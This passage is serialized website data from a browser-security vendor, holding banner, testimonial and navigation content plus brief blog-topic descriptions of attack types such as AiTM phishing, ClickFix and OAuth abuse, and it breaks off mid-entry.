[{"data":1,"prerenderedAt":77345},["ShallowReactive",2],{"application-flags":3,"navbar":7,"always-visible-banner":36,"navbar-about-highlight":108,"navbar-resource-highlight":182,"blog-topics":226,"trust-badges":656,"solution-nav":677,"fa-icon-solid-faUserSecret":800,"fa-icon-sharp-regular-faLaptopCode":804,"fa-icon-solid-faPlugCircleXmark":806,"fa-icon-sharp-regular-faPuzzlePiece":808,"fa-icon-solid-faFileCircleXmark":810,"fa-icon-solid-faGhost":813,"fa-icon-solid-faQrcode":816,"fa-icon-solid-faCookieBite":818,"fa-icon-sharp-regular-faFishingRod":820,"fa-icon-sharp-regular-faUserSecret":822,"fa-icon-sharp-regular-faRadar":824,"fa-icon-sharp-regular-faSatelliteDish":826,"fa-icon-sharp-regular-faShieldCheck":828,"fa-icon-sharp-regular-faBrainCircuit":830,"fa-icon-solid-faMobileScreenButton":832,"fa-icon-brands-faChrome":834,"fa-icon-solid-faDisplay":836,"fa-icon-solid-faFilter":838,"fa-icon-solid-faCloudArrowUp":840,"blog-topic-legitimate-service-abuse":842},[4],{"name":5,"enabled":6},"maintenanceMode",false,[8],{"createdDate":9,"id":10,"name":11,"modelId":12,"published":13,"meta":14,"query":22,"data":23,"variations":28,"lastUpdated":29,"firstPublished":30,"testRatio":31,"createdBy":32,"lastUpdatedBy":33,"folders":34,"rev":35},1742208588866,"1c7a4e423bf54ac1a328bb4063459ef2","Banner","1c6207a5f24948ab82d4a0b17f251193","published",{"breakpoints":15,"hasAutosaves":19,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},768,640,320,true,"data","",[],{"link":24,"text":25,"type":26,"url":27},{},"Get our latest report analyzing browser attack techniques in 2026","web-banner","https://pushsecurity.com/resources/browser-attacks-report",{},1774258294825,1742208637545,1,"CydmZnOWU1XuAaLhEDCoYNM4Z8W2","jKjF9r5jcvXU8tzZEfFQm31Iyvr2",[],"j7ew2tin4q",{"createdBy":37,"createdDate":38,"data":39,"folders":94,"id":95,"lastUpdated":96,"lastUpdatedBy":97,"meta":98,"modelId":102,"name":103,"published":13,"query":104,"testRatio":31,"variations":105,"firstPublished":106,"stageModifiedSincePublish":6,"rev":107},"ST0tXQM8slWpFrmioqKHmENB2qe2",1774965361051,{"ctaText":40,"text":41,"url":21,"blocks":42,"state":90},"ewrererw","testrfesssssssssss",[43,70,78],{"@type":44,"@version":45,"id":46,"component":47,"responsiveStyles":60},"@builder.io/sdk:Element",2,"builder-ca12c06a52de41d7b8743da53118cd38",{"name":48,"tag":48,"options":49,"isRSC":59},"TopBannerContent",{"text":50,"ctaText":51,"url":52,"mainText":53,"cta":56},"New Webinar Series: Join John Hammond, Troy Hunt, and Matt Johansen for the State of Browser Attacks","Save Your Spot","https://pushsecurity.com/webinar/state-of-browser-security",{"content":54,"fontSize":55},"\u003Cp class=\"\">Do you know how much AI is in your workforce? Find out August 20th.\u003C/p>","text-base",{"content":57,"fontSize":55,"url":58},"\u003Cp class=\"\">Save your seat →\u003C/p>","https://pushsecurity.com/webinar/shadow-ai",null,{"large":61},{"display":62,"flexDirection":63,"position":64,"flexShrink":65,"boxSizing":66,"marginTop":67,"marginBottom":67,"fontSize":68,"fontWeight":69},"flex","column","relative","0","border-box",".56rem","1.125rem","700",{"@type":44,"@version":45,"id":71,"component":72,"responsiveStyles":76},"builder-a2e1f4b9f30b464bb814d7f5de5b0aa7",{"name":73,"options":74,"isRSC":59},"Custom Code",{"code":75,"scriptsClientOnly":6},"\u003Cstyle>\n  .top-banner.bg-web-orange{background:rgb(114, 79, 255);}\n\u003C/style>\n",{"large":77},{"display":62,"flexDirection":63,"position":64,"flexShrink":65,"boxSizing":66},{"id":79,"@type":44,"tagName":80,"properties":81,"responsiveStyles":85},"builder-pixel-k74nkzlquog","img",{"src":82,"aria-hidden":83,"alt":21,"role":84,"width":65,"height":65},"https://cdn.builder.io/api/v1/pixel?apiKey=f3a1111ff5be48cdbb123cd9f5795a05","true","presentation",{"large":86},{"height":65,"width":65,"display":87,"opacity":65,"overflow":88,"pointerEvents":89},"block","hidden","none",{"deviceSize":91,"location":92},"large",{"path":21,"query":93},{},[],"fd266d0172cc47429be7ad10f48c99ad",1786155414606,"kYgMv6WsbvfmlOUYqR2SFwGzw6e2",{"breakpoints":99,"hasAutosaves":6,"hasErrors":6,"hasLinks":6,"kind":100,"lastPreviewUrl":101},{"medium":16,"small":17,"xsmall":18},"component","https://pushsecurity.com/?builder.space=f3a1111ff5be48cdbb123cd9f5795a05&builder.user.permissions=read%2Ccreate%2Cpublish%2CeditDesigns%2CeditLayouts%2CeditLayers%2CeditContentPriority%2CeditFolders%2CcreateProjects%2CsendPullRequests%2CfusionHostingPublish&builder.user.role.name=Designer&builder.user.role.id=creator&builder.cachebust=true&builder.preview=always-visible-banner&builder.noCache=true&builder.allowTextEdit=true&__builder_editing__=true&builder.overrides.always-visible-banner=fd266d0172cc47429be7ad10f48c99ad&builder.overrides.fd266d0172cc47429be7ad10f48c99ad=fd266d0172cc47429be7ad10f48c99ad&builder.options.locale=Default","0678d178ec8b41efb8a23c09dba7874d","always visible banner",[],{},1774968080803,"1lcyl36j3gz",[109,145],{"createdBy":32,"createdDate":110,"data":111,"folders":134,"id":135,"lastUpdated":136,"lastUpdatedBy":32,"meta":137,"modelId":139,"name":140,"published":13,"query":141,"stageModifiedSincePublish":6,"testRatio":31,"variations":142,"firstPublished":143,"rev":144},1776247359804,{"link":112,"testimonial":113,"testimonialLink":133,"type":116},{},{"@type":114,"id":115,"model":116,"value":117},"@builder.io/core:Reference","f028f2b685bb47cd8bf9e82a26dd5a79","testimonial",{"query":118,"folders":119,"createdDate":120,"id":115,"name":121,"modelId":122,"published":13,"data":123,"variations":127,"lastUpdated":128,"firstPublished":129,"testRatio":31,"createdBy":37,"lastUpdatedBy":37,"meta":130,"rev":132},[],[],1735823466309,"We found Push to be more accurate when compared to competitors and the browser agent offered features that others couldn’t match.","42035571a56940ac98bff4544aa79aa5",{"author":124,"jobTitle":125,"quote":121,"image":126},"Jason Waits","\u003Cp>CISO at Inductive Automation\u003C/p>","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2Ff04c0c0689ce4a89ac0f0708d78c0a07",{},1735910703862,1735823501152,{"kind":20,"lastPreviewUrl":21,"breakpoints":131,"hasAutosaves":19},{"small":17,"medium":16},"xal7chkxmdh","/customer-stories/inductive-automation",[],"9136a8f18b3b4a6ba29b8653a99372b1",1776247404986,{"breakpoints":138,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"20d9eaa352304613b3d1a794b400703d","testimonial-inductive-automation",[],{},1776247404973,"5mqgwlt47hs",{"createdBy":32,"createdDate":146,"data":147,"folders":174,"id":175,"lastUpdated":176,"lastUpdatedBy":32,"meta":177,"modelId":139,"name":172,"published":13,"query":179,"stageModifiedSincePublish":6,"testRatio":31,"variations":180,"firstPublished":181,"rev":144},1776255761419,{"description":148,"image":149,"link":150,"testimonial":153,"title":172,"type":173},"Learn about the latest techniques being used in the wild.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F7b4a5ebf81d64e8c9d7fc35f6c96c4a9",{"text":151,"url":152},"Download now","/resources/browser-attacks-report",{"@type":114,"id":154,"model":116,"value":155},"192acbb1f9ca4cac918c0ec435a8bae3",{"query":156,"folders":157,"createdDate":158,"id":154,"name":159,"modelId":122,"published":13,"data":160,"variations":166,"lastUpdated":167,"firstPublished":168,"testRatio":31,"createdBy":37,"lastUpdatedBy":32,"meta":169,"rev":171},[],[],1728981467463,"Push does for identity what CrowdStrike did for the endpoint",{"video":161,"jobTitle":162,"author":163,"qoute":21,"quote":164,"image":165},"https://cdn.builder.io/o/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F8b30e8ca50064058bbaef0f3c6164575%2Fcompressed?apiKey=f3a1111ff5be48cdbb123cd9f5795a05&token=8b30e8ca50064058bbaef0f3c6164575&alt=media&optimized=true","\u003Cp>Deputy CISO at Microsoft\u003C/p>\u003Cp>Former LinkedIn, Slack, Palantir\u003C/p>","Geoff Belknap","Push does for identity what CrowdStrike did for the endpoint.","https://cdn.builder.io/api/v1/image/assets%2Ff3a1111ff5be48cdbb123cd9f5795a05%2F748f0ad0a5064a00a13f4721fcc8dea1",{},1742902158597,1728981782923,{"kind":20,"lastPreviewUrl":21,"breakpoints":170,"hasAutosaves":19},{"small":17,"medium":16},"kg131t0jkvo","Report: 2026 Browser Attack Techniques","resource",[],"05a9322735fc427db12e2740e4302300",1776255810913,{"breakpoints":178,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},[],{},1776255810900,[183,205],{"createdBy":32,"createdDate":184,"data":185,"folders":195,"id":196,"lastUpdated":197,"lastUpdatedBy":32,"meta":198,"modelId":200,"name":172,"published":13,"query":201,"stageModifiedSincePublish":6,"testRatio":31,"variations":202,"firstPublished":203,"rev":204},1776256900280,{"description":148,"image":149,"link":186,"testimonial":187,"title":172,"type":173},{"text":151,"url":152},{"@type":114,"id":154,"model":116,"value":188},{"query":189,"folders":190,"createdDate":158,"id":154,"name":159,"modelId":122,"published":13,"data":191,"variations":192,"lastUpdated":167,"firstPublished":168,"testRatio":31,"createdBy":37,"lastUpdatedBy":32,"meta":193,"rev":171},[],[],{"video":161,"jobTitle":162,"author":163,"qoute":21,"quote":164,"image":165},{},{"kind":20,"lastPreviewUrl":21,"breakpoints":194,"hasAutosaves":19},{"small":17,"medium":16},[],"1f429607996e4e5fae8fe3f9b9610e55",1776256937553,{"breakpoints":199,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"4829faa81e7c4ee8bd2d000e160e8d3c",[],{},1776256937540,"470xio0yv7r",{"createdBy":32,"createdDate":206,"data":207,"folders":217,"id":218,"lastUpdated":219,"lastUpdatedBy":32,"meta":220,"modelId":200,"name":222,"published":13,"query":223,"stageModifiedSincePublish":6,"testRatio":31,"variations":224,"firstPublished":225,"rev":204},1776256949234,{"link":208,"testimonial":209,"testimonialLink":133,"type":116},{},{"@type":114,"id":115,"model":116,"value":210},{"query":211,"folders":212,"createdDate":120,"id":115,"name":121,"modelId":122,"published":13,"data":213,"variations":214,"lastUpdated":128,"firstPublished":129,"testRatio":31,"createdBy":37,"lastUpdatedBy":37,"meta":215,"rev":132},[],[],{"author":124,"jobTitle":125,"quote":121,"image":126},{},{"kind":20,"lastPreviewUrl":21,"breakpoints":216,"hasAutosaves":19},{"small":17,"medium":16},[],"ce043785b71b4ece98eac811ecf4ba10",1776256974140,{"breakpoints":221,"hasAutosaves":6,"kind":20,"lastPreviewUrl":21},{"medium":16,"small":17,"xsmall":18},"inductive-automation",[],{},1776256974130,{"id":227,"extension":228,"items":229,"meta":653,"stem":654,"__hash__":655},"blogTopics/blogtopics.json","json",[230,239,247,256,265,274,283,292,301,310,319,328,337,346,355,363,372,381,390,399,408,417,426,435,443,452,461,470,479,488,497,506,514,523,532,540,549,558,566,575,584,593,602,611,619,628,637,645],{"sys":231,"faqItemsCollection":233,"name":235,"slug":236,"tier":31,"intro":237,"faqTitle":59,"postCount":238,"hasPage":19},{"id":232},"topic-ai",{"items":234},[],"AI","ai","AI is reshaping both sides of the security equation: employees adopt AI tools faster than security teams can track them, while attackers use AI to scale and automate campaigns. Shadow AI adoption may now outpace wider shadow SaaS, and attackers are already turning AI chatbot platforms into malware delivery channels. Push has researched the offensive potential of computer-using agents and now applies AI agents to its own threat hunting. This hub covers AI as risk, target, and defensive tool.",22,{"sys":240,"faqItemsCollection":242,"name":244,"slug":245,"tier":45,"intro":246,"faqTitle":59,"postCount":238,"hasPage":19},{"id":241},"topic-ai-attacks",{"items":243},[],"AI attacks","ai-attacks","AI attacks run in both directions: attackers using AI to scale phishing, malware delivery, and identity attacks, and AI platforms themselves becoming the attack surface. Push has researched how computer-using agents can automate identity attacks, and has seen the poisoned tenant technique it coined used against its own employees in the wild.",{"sys":248,"faqItemsCollection":250,"name":252,"slug":253,"tier":45,"intro":254,"faqTitle":59,"postCount":255,"hasPage":19},{"id":249},"topic-ai-governance",{"items":251},[],"AI governance","ai-governance","AI governance is how organizations set and enforce rules for workplace AI use — which tools are allowed, what data can enter them, and how to evidence it to regulators. With US, EU, and UK AI regulations converging on obligations most organizations can’t yet meet, Push’s research makes the case that enforcement starts in the browser, where AI tools are actually used.",9,{"sys":257,"faqItemsCollection":259,"name":261,"slug":262,"tier":45,"intro":263,"faqTitle":59,"postCount":264,"hasPage":19},{"id":258},"topic-aitm",{"items":260},[],"AiTM phishing","aitm","Adversary-in-the-middle (AiTM) phishing proxies a real login page through an attacker-controlled site, capturing credentials, MFA codes, and session tokens in real time to bypass multi-factor authentication. Push’s research into kits like Evilginx and Sneaky2FA documents how they evade URL- and signature-based detection — and why analyzing toolkit behavior in the browser catches attacks that blocklists miss.",77,{"sys":266,"faqItemsCollection":268,"name":270,"slug":271,"tier":45,"intro":272,"faqTitle":59,"postCount":273,"hasPage":6},{"id":267},"topic-bec",{"items":269},[],"BEC","bec","Business email compromise (BEC) turns a hijacked mailbox into a fraud tool: attackers use mail rules, auto-forwarding, and payment redirection to steal money while staying invisible to the account owner. Alongside a first-hand case study of a BEC attack that nearly cost an engineering firm millions, Push breaks down these mailbox persistence tricks and how to detect them.",3,{"sys":275,"faqItemsCollection":277,"name":279,"slug":280,"tier":31,"intro":281,"faqTitle":59,"postCount":282,"hasPage":19},{"id":276},"topic-browser-attacks",{"items":278},[],"Browser attacks","browser-attacks","Browser attacks target users through the web pages, sessions, and extensions they rely on every day — bypassing endpoint and network defenses that never see inside the browser. Techniques like AiTM phishing kits, ClickFix-style copy-paste attacks, OAuth consent abuse, malvertising, and browser sync abuse have become a leading path to account takeover. Push researchers analyze these attacks in the wild, from infiltrating criminal phishing panels to dissecting toolkits like ConsentFix and Sneaky2FA. Use this hub to track how the techniques evolve and how to defend against them.",118,{"sys":284,"faqItemsCollection":286,"name":288,"slug":289,"tier":45,"intro":290,"faqTitle":59,"postCount":291,"hasPage":19},{"id":285},"topic-browser-extensions",{"items":287},[],"Browser extensions","browser-extensions","Browser extensions cut both ways for security teams: malicious or compromised extensions are a growing attack vector, while an extension is also the lightest-weight way to deploy security controls into the browsers employees already use. These posts cover both sides — extension-borne risks like browser sync attacks and the limits of risk scoring, and how Push uses its extension to detect threats and block risky extensions.",30,{"sys":293,"faqItemsCollection":295,"name":297,"slug":298,"tier":31,"intro":299,"faqTitle":59,"postCount":300,"hasPage":19},{"id":294},"topic-browser-security",{"items":296},[],"Browser security","browser-security","Work now happens in the browser, making browser security — visibility and control at the point where users meet the web — a core layer of enterprise defense. Endpoint, network, and email tools miss attacks that unfold inside the browser session, from AiTM phishing to risky extensions and shadow SaaS. Push has published extensively on choosing between enterprise browsers and browser extensions, using browser telemetry, and making the business case for browser security. Start here for both strategy and hands-on guidance.",127,{"sys":302,"faqItemsCollection":304,"name":306,"slug":307,"tier":45,"intro":308,"faqTitle":59,"postCount":309,"hasPage":19},{"id":303},"topic-casb",{"items":305},[],"CASB","casb","Cloud access security brokers (CASBs) govern cloud app usage through API integrations and network proxies — an approach that works for sanctioned apps but struggles with the long tail of shadow SaaS employees adopt on their own. Because every SaaS signup happens in a browser, Push captures that adoption in real time at the point of login, and these posts cover what proxy-based discovery misses.",12,{"sys":311,"faqItemsCollection":313,"name":315,"slug":316,"tier":45,"intro":317,"faqTitle":59,"postCount":318,"hasPage":19},{"id":312},"topic-clickfix",{"items":314},[],"ClickFix","clickfix","ClickFix attacks trick users into copying and running malicious commands themselves — typically through fake CAPTCHA, error, or fix-it prompts — so malware executes without a download for security tools to scan. Push researchers track the technique’s evolution in the wild and identified the ConsentFix and InstallFix variants, which extend it to OAuth consent grants and fake install guides.",39,{"sys":320,"faqItemsCollection":322,"name":324,"slug":325,"tier":45,"intro":326,"faqTitle":59,"postCount":327,"hasPage":19},{"id":321},"topic-credential-phishing",{"items":323},[],"Credential phishing","credential-phishing","Credential phishing steals usernames and passwords through fake login pages impersonating the services employees use, handing attackers direct access to corporate accounts. Attackers don’t hack in — they log in. Push’s browser extension analyzes login pages as users actually see them, blocking cloned pages and stopping employees from entering company passwords on lookalike sites.",89,{"sys":329,"faqItemsCollection":331,"name":333,"slug":334,"tier":45,"intro":335,"faqTitle":59,"postCount":336,"hasPage":19},{"id":330},"topic-credential-stuffing",{"items":332},[],"Credential stuffing","credential-stuffing","Credential stuffing is an attack where criminals replay username-password pairs stolen from one breach against other services, exploiting password reuse to take over accounts. Major breaches have shown how far a single set of stolen credentials can travel. Push detects verified stolen credentials by comparing employee passwords against breach datasets and dark-web threat intelligence, eliminating false positives.",64,{"sys":338,"faqItemsCollection":340,"name":342,"slug":343,"tier":31,"intro":344,"faqTitle":59,"postCount":345,"hasPage":19},{"id":339},"topic-detection-and-response",{"items":341},[],"Detection & response","detection-and-response","Detection and response is being reshaped as attacks move into the browser, where EDR, SIEM, and network tools have limited visibility. Modern phishing kits evade signature-based detection, and most malicious pages have never been seen before — so technique-level, in-browser detection matters more than known-bad indicators. Push’s work here spans high-fidelity browser telemetry, session token theft detection, and agentic threat hunting, plus practical IR guidance for compromised SaaS accounts and malicious OAuth apps. These posts cover both the philosophy and the workflows.",101,{"sys":347,"faqItemsCollection":349,"name":351,"slug":352,"tier":45,"intro":353,"faqTitle":59,"postCount":354,"hasPage":19},{"id":348},"topic-detection-engineering",{"items":350},[],"Detection engineering","detection-engineering","Detection engineering turns threat research into reliable, high-fidelity detections — and as AI accelerates the churn of attacker infrastructure, indicator-based detection is collapsing in favor of technique-level approaches. Here you’ll find teardowns of AiTM kits, ClickFix pages, and malvertising campaigns, alongside Push’s own account of building an agentic threat hunting pipeline that turns hunts into shipped detections.",42,{"sys":356,"faqItemsCollection":358,"name":360,"slug":361,"tier":45,"intro":362,"faqTitle":59,"postCount":238,"hasPage":19},{"id":357},"topic-device-code-phishing",{"items":359},[],"Device code phishing","device-code-phishing","Device code phishing abuses the OAuth device authorization flow: attackers generate a legitimate sign-in code, trick the victim into entering it on the vendor’s real login page, and walk away with access tokens — no fake site or password capture required. Push research tracked a sharp spike in adoption during 2026 as attackers use the technique to sidestep standard access controls.",{"sys":364,"faqItemsCollection":366,"name":368,"slug":369,"tier":45,"intro":370,"faqTitle":59,"postCount":371,"hasPage":19},{"id":365},"topic-dlp",{"items":367},[],"DLP","dlp","Data loss prevention (DLP) is the practice of stopping sensitive data from leaving your control — a problem that has shifted from email and endpoints to the browser, where employees move data into SaaS and AI tools. Push applies controls at that point of use, from keeping corporate credentials out of personal password managers to governing what flows into unsanctioned apps.",15,{"sys":373,"faqItemsCollection":375,"name":377,"slug":378,"tier":45,"intro":379,"faqTitle":59,"postCount":380,"hasPage":19},{"id":374},"topic-edr",{"items":376},[],"EDR","edr","Endpoint detection and response (EDR) watches processes, files, and memory on the device — a vantage point that never sees the phishing pages, stolen sessions, and identity attacks playing out inside the browser. That’s not an EDR failure; attackers have simply moved where it can’t follow. These posts map that gap and show how Push pairs browser-level detection and response with endpoint security to close it.",24,{"sys":382,"faqItemsCollection":384,"name":386,"slug":387,"tier":45,"intro":388,"faqTitle":59,"postCount":389,"hasPage":19},{"id":383},"topic-enterprise-browser",{"items":385},[],"Enterprise browser","enterprise-browser","An enterprise browser is a standalone, security-hardened browser that organizations deploy in place of Chrome, Edge, or other defaults. The real buying question is whether replacing the browser beats securing the browsers employees already use — a trade-off these posts examine directly, alongside analysis of Omdia’s secure enterprise browser market report and Push’s framework for weighing full browsers against extension-based deployment.",6,{"sys":391,"faqItemsCollection":393,"name":395,"slug":396,"tier":45,"intro":397,"faqTitle":59,"postCount":398,"hasPage":19},{"id":392},"topic-ghost-logins",{"items":394},[],"Ghost logins","ghost-logins","Ghost logins are overlooked authentication routes into an account — like a password login lingering behind SSO, or a forgotten secondary auth method — that attackers exploit for account takeover and persistence. Push coined the term after research showing how these forgotten login paths let attackers sidestep the MFA and SSO controls guarding an account’s primary sign-in method.",48,{"sys":400,"faqItemsCollection":402,"name":404,"slug":405,"tier":45,"intro":406,"faqTitle":59,"postCount":407,"hasPage":19},{"id":401},"topic-identity-attacks",{"items":403},[],"Identity attacks","identity-attacks","Identity attacks target user accounts rather than infrastructure — phishing credentials, stealing sessions, abusing OAuth grants — because logging in is easier than hacking in. Identity-based techniques are now the leading cause of breaches. Push’s offensive research maps these techniques continuously, coining attacks like SAMLjacking and the poisoned tenant before they appeared in the wild.",56,{"sys":409,"faqItemsCollection":411,"name":413,"slug":414,"tier":31,"intro":415,"faqTitle":59,"postCount":416,"hasPage":19},{"id":410},"topic-identity-security",{"items":412},[],"Identity security","identity-security","Identity security is the practice of protecting workforce accounts, credentials, and sessions — the primary route attackers now use to breach organizations. Instead of hacking in, attackers log in: through phished credentials, stolen session tokens, MFA bypass, and forgotten ghost logins. Push’s research team documents these techniques continuously, from cross-IdP impersonation and SAMLjacking to analyses of major identity-driven breaches. This hub collects that research alongside practical guidance on MFA, SSO, and stopping account takeover.",154,{"sys":418,"faqItemsCollection":420,"name":422,"slug":423,"tier":45,"intro":424,"faqTitle":59,"postCount":425,"hasPage":19},{"id":419},"topic-infostealer",{"items":421},[],"Infostealer","infostealer","Infostealers are malware built to harvest saved passwords, cookies, and session tokens from infected devices, supplying the stolen credentials behind some of the most consequential breaches of recent years. Push traces the ecosystem trading this data and checks employee passwords against threat intel feeds, flagging verified stolen credentials before attackers can log in with them.",52,{"sys":427,"faqItemsCollection":429,"name":431,"slug":432,"tier":45,"intro":433,"faqTitle":59,"postCount":434,"hasPage":19},{"id":428},"topic-legitimate-service-abuse",{"items":430},[],"Legitimate service abuse","legitimate-service-abuse","Legitimate service abuse means staging attacks on trusted platforms — Google Ads, AI chatbot share pages, office.com links, Slack, SaaS tenants — so malicious content inherits the reputation of the service hosting it. Push research has documented the pattern repeatedly, from malvertising run through hijacked Google Ad Manager accounts to phishing links generated by Active Directory Federation Services.",28,{"sys":436,"faqItemsCollection":438,"name":440,"slug":441,"tier":45,"intro":442,"faqTitle":59,"postCount":291,"hasPage":19},{"id":437},"topic-malvertising",{"items":439},[],"Malvertising","malvertising","Malvertising uses paid search and display ads to put phishing pages and malware in front of users, often by impersonating trusted brands at the top of Google results. Push tracks these campaigns continuously — intercepting live attacks spoofing well-known brands — and has documented how criminals hijack Google Ads accounts to fund and run them.",{"sys":444,"faqItemsCollection":446,"name":448,"slug":449,"tier":45,"intro":450,"faqTitle":59,"postCount":451,"hasPage":19},{"id":445},"topic-malware-delivery",{"items":447},[],"Malware delivery","malware-delivery","Malware delivery has moved into the browser: rather than email attachments, attackers now rely on malvertising, fake install guides, and ClickFix-style copy-paste lures to get code running on endpoints. Push research on techniques like InstallFix maps the playbook, and in-browser detection of malicious copy and paste blocks these attacks before commands reach the endpoint.",13,{"sys":453,"faqItemsCollection":455,"name":457,"slug":458,"tier":45,"intro":459,"faqTitle":59,"postCount":460,"hasPage":19},{"id":454},"topic-mfa",{"items":456},[],"MFA","mfa","Multi-factor authentication (MFA) requires a second proof of identity beyond a password, and it remains one of the most effective controls against account takeover. Regulators from Cyber Essentials to NYDFS now mandate it across cloud services. Push enforces MFA in the browser on third-party apps — even those with no native enforcement option — and shows security teams where coverage gaps remain.",83,{"sys":462,"faqItemsCollection":464,"name":466,"slug":467,"tier":45,"intro":468,"faqTitle":59,"postCount":469,"hasPage":19},{"id":463},"topic-mfa-bypass",{"items":465},[],"MFA bypass","mfa-bypass","MFA bypass covers the techniques attackers use to defeat multi-factor authentication — AiTM phishing kits, consent phishing, device code phishing, and MFA downgrade attacks among them. None of these break the second factor; they route around it. Push researchers regularly get hands-on with phishing kits like Evilginx and Sneaky2FA, analyzing how these attacks work in the wild and how they evolve.",58,{"sys":471,"faqItemsCollection":473,"name":475,"slug":476,"tier":45,"intro":477,"faqTitle":59,"postCount":478,"hasPage":19},{"id":472},"topic-non-email-phishing",{"items":474},[],"Non-email phishing","non-email-phishing","Non-email phishing delivers malicious links through channels your secure email gateway never sees — social media messages, IM apps like Slack and Teams, search ads, and SMS. Push has intercepted live campaigns arriving via LinkedIn DMs, malvertising, and messaging platforms, which is why it detects phishing pages in the browser at the point of click, regardless of delivery channel.",51,{"sys":480,"faqItemsCollection":482,"name":484,"slug":485,"tier":45,"intro":486,"faqTitle":59,"postCount":487,"hasPage":19},{"id":481},"topic-oauth-abuse",{"items":483},[],"OAuth abuse","oauth-abuse","OAuth abuse is attackers exploiting app-to-app authorization — consent phishing, malicious OAuth apps, stolen tokens, and device code flows — to gain persistent access to cloud tenants without touching a password or MFA prompt. Push tracks these techniques continuously and discovered ConsentFix, a browser-native attack in the wild that pairs OAuth consent phishing with a ClickFix-style prompt.",70,{"sys":489,"faqItemsCollection":491,"name":493,"slug":494,"tier":45,"intro":495,"faqTitle":59,"postCount":496,"hasPage":19},{"id":490},"topic-passkeys",{"items":492},[],"Passkeys","passkeys","Passkeys are phishing-resistant credentials that replace passwords with cryptographic key pairs bound to a user’s device. They defeat conventional credential phishing, but attackers adapt: Push research has documented MFA downgrade, app-specific password phishing, and device code phishing being used in the wild to route around passkey-protected accounts. Deploying passkeys is step one; closing those fallback paths is step two.",21,{"sys":498,"faqItemsCollection":500,"name":502,"slug":503,"tier":45,"intro":504,"faqTitle":59,"postCount":505,"hasPage":19},{"id":499},"topic-password-security",{"items":501},[],"Password security","password-security","Password security is the practice of keeping workforce credentials strong, unique, and out of attackers’ hands — still a frontline defense while most SaaS logins depend on passwords. Expiration policies don’t fix weak or reused passwords; visibility does. Push observes real logins in the browser to flag weak, reused, and breached passwords and guide employees to reset them on any app.",79,{"sys":507,"faqItemsCollection":509,"name":511,"slug":512,"tier":45,"intro":513,"faqTitle":59,"postCount":318,"hasPage":19},{"id":508},"topic-phaas",{"items":510},[],"PhaaS","phaas","Phishing-as-a-service (PhaaS) platforms sell ready-made phishing kits, hosted infrastructure, and management panels on subscription, letting low-skill criminals run MFA-bypassing campaigns at scale. Kits like Evilginx, Tycoon2FA, Sneaky2FA, FlowerStorm, and EvilTokens each add their own evasion and session-theft capabilities, and new entrants appear regularly. Push researchers continuously get hands-on with these tools — investigating attacks in the wild, reverse-engineering kit behavior, and turning that research into detections.",{"sys":515,"faqItemsCollection":517,"name":519,"slug":520,"tier":31,"intro":521,"faqTitle":59,"postCount":522,"hasPage":19},{"id":516},"topic-phishing",{"items":518},[],"Phishing","phishing","Phishing remains the most common way attackers compromise business accounts — and it has moved far beyond suspicious emails. Modern campaigns use AiTM toolkits that bypass MFA, consent phishing against OAuth, device code phishing, and lures delivered through malvertising, LinkedIn, and Slack. Push detects and blocks these attacks in the browser, and its researchers publish teardowns of live campaigns and kits like Evilginx and Sneaky2FA. Read on for how phishing actually works today and what stops it.",91,{"sys":524,"faqItemsCollection":526,"name":528,"slug":529,"tier":45,"intro":530,"faqTitle":59,"postCount":531,"hasPage":19},{"id":525},"topic-public-breach",{"items":527},[],"Public breach","public-breach","Public breaches are the disclosed incidents that show how attacks actually unfold once the headlines fade. Push’s breach analyses keep finding identity at the entry point: stolen credentials, OAuth abuse, and missing MFA recur across the incidents analyzed here.",29,{"sys":533,"faqItemsCollection":535,"name":537,"slug":538,"tier":45,"intro":539,"faqTitle":59,"postCount":451,"hasPage":19},{"id":534},"topic-ransomware",{"items":536},[],"Ransomware","ransomware","Ransomware attacks increasingly begin with an identity, not an exploit: stolen credentials, MFA bypass, and help desk scams give operators their initial foothold. The analysis here follows that front end of the kill chain — how identity compromise leads to ransomware deployment, and the breaches driving regulators toward tighter MFA requirements.",{"sys":541,"faqItemsCollection":543,"name":545,"slug":546,"tier":31,"intro":547,"faqTitle":59,"postCount":548,"hasPage":19},{"id":542},"topic-saas-security",{"items":544},[],"SaaS security","saas-security","SaaS security means protecting the sprawl of cloud apps, accounts, and integrations your employees adopt — often without IT ever knowing. Shadow SaaS, risky OAuth grants, ghost logins, and unmanaged third-party access create attack paths traditional controls can’t see, as recent high-profile breaches have demonstrated. Building on the original SaaS attack matrix, Push continues to map SaaS-native attack techniques alongside practical guides for discovering and securing unsanctioned apps, and this hub gathers all of it.",96,{"sys":550,"faqItemsCollection":552,"name":554,"slug":555,"tier":45,"intro":556,"faqTitle":59,"postCount":557,"hasPage":6},{"id":551},"topic-security-training",{"items":553},[],"Security training","security-training","Security training aims to teach employees to recognize and avoid attacks — yet modern phishing routinely fools even seasoned security professionals. Push argues that training budgets work harder as real-time, in-browser intervention: guardrails and warnings at the moment of risk, rather than lessons employees must recall under pressure.",4,{"sys":559,"faqItemsCollection":561,"name":563,"slug":564,"tier":45,"intro":565,"faqTitle":59,"postCount":389,"hasPage":19},{"id":560},"topic-seo-poisoning",{"items":562},[],"SEO poisoning","seo-poisoning","SEO poisoning manipulates search engine results so malicious pages rank prominently for the software, tools, or services users are actively searching for, turning a routine search into an infection vector. It often pairs with malvertising and ClickFix-style payloads — Push has documented attackers abusing shared pages on legitimate AI chatbot domains to deliver malware from trusted infrastructure.",{"sys":567,"faqItemsCollection":569,"name":571,"slug":572,"tier":45,"intro":573,"faqTitle":59,"postCount":574,"hasPage":19},{"id":568},"topic-session-hijacking",{"items":570},[],"Session hijacking","session-hijacking","Session hijacking is the theft of an authenticated session — usually via stolen session cookies or tokens — letting attackers walk past passwords and MFA into a live account. AiTM phishing kits and infostealers have made it a mainstream attack technique across both criminal and targeted intrusions. Push’s browser agent detects session token theft by adding telemetry to the user agent string, creating a high-fidelity signal for security 